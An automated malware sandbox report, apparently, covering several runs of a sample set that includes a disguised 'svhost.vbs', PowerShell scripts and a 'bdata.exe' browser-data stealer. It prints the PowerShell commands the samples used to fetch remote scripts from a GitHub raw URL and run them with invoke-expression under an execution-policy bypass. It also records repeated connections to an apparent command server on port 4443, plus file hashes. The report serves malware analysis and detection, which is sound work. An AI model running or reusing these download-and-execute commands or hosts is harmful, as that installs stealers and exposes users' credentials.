"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:80 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 8.153.16.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp

Files

memory/1672-0-0x00007FFB39E23000-0x00007FFB39E25000-memory.dmp

memory/1672-7-0x000001D0618F0000-0x000001D061912000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2oi2u0te.pny.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1672-11-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp

memory/1672-12-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp

memory/1672-13-0x000001D07B550000-0x000001D07BCF6000-memory.dmp

memory/1672-15-0x00007FFB39E23000-0x00007FFB39E25000-memory.dmp

memory/1672-16-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240708-en

Max time kernel

134s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Network

Country Destination Domain Proto
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp

Files

memory/1500-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

memory/1500-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/1500-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

memory/1500-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/1500-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

memory/1500-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

memory/1500-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

memory/1500-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

memory/1500-12-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

memory/1500-13-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240729-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

138s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/4388-0-0x00007FFF66363000-0x00007FFF66365000-memory.dmp

memory/4388-1-0x000001459B590000-0x000001459B5B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zox3i0nt.io2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4388-11-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

memory/4388-12-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

memory/4388-15-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl

Network

N/A

Files

memory/2672-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp

memory/2672-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/2672-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

memory/2672-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 15949652452d63a0038444a725cc7945
SHA1 a3da3f48ae9ef882ec9cb2b089684a7aa755ebe6
SHA256 ecb4c8f2a83ee45e03f6c591ed6b20ee244d80429b43b66317dd59677c14eb2c
SHA512 4be22050b6bc257c842b85d14f5bc01d2487344b815f328a7139ade6895215799ed5750b6fbf14d8dbdfac4b8f9b8f85dd46d9c7564163349d1cfcb2edbcd2ce

memory/2584-18-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-17-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2584-19-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

124s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/3424-0-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp

memory/3424-10-0x000001533F760000-0x000001533F782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wv4zzno4.he4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3424-11-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

memory/3424-12-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/2460-17-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

memory/3424-16-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83449265ddea29564af2cefc93493459
SHA1 8068c5f88cf4ba3e5f10fa864461c72f9d368d4d
SHA256 26ce8143a8c7ba0a96779bdacab1ee547b89840abd1d1cb4a8d8b2d99d72e8e9
SHA512 89b342aa6fd4a83ed99f6030b1e7bffb63c8ee3eddbba7324e5a265a1968536c4de28e42ecdee13566ef2c3904cfc3ecb7bd33d58d2d3b5d6c7f0ae476203e9d

memory/2460-28-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

memory/2460-29-0x00000172AA730000-0x00000172AAED6000-memory.dmp

memory/2460-32-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Browser Information Discovery

discovery

Processes

C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Local Storage\leveldb_7.temp\CURRENT.bak

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\Session Storage_8.temp\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b